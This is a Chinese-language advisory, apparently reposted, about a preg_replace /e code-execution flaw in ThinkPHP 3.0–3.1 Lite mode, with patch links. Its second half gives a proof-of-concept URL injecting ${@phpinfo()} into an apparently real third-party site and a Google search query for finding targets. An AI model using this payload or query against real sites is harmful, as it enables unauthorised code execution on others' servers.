近日360庫帶計划中播報的ThinkPHP擴展類庫的漏洞已經查明原因:系官方擴展模式中的Lite精簡模式中存在可能的漏洞(原先核心更新安全的時候 並沒有更新模式擴展部分,現已更新)。
對於使用標准模式或者其他模式的用戶不存在此漏洞,敬請放心。3.2版本已經對擴展重新設計(原來的模式擴展、引擎擴展均不再支持),也不存在此問題。
請有使用ThinkPHP3.0~3.1版本的Lite模式的用戶注意更新。
Lite模式擴展包下載地址:http://www.thinkphp.cn/extend/219.html
360庫帶計划:http://loudong.360.cn/vul/info/id/2919
ThinkPHP 開啟lite模式后,會加載ThinkPHP/Extend/Mode/Lite/Dispacher.class.php去匹配URL並分發用戶請求, 而在該文件的65行使用perg_replace函數的 /e參數,
第二個參數引用的時候使用了雙引號,從而導致代碼執行。
測試:http://www.rru-gz.com/index.php/Index/index/name/$%7B@phpinfo%28%29%7D
Google語法:
inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework } 禁止用在非法用途
[via@0day5]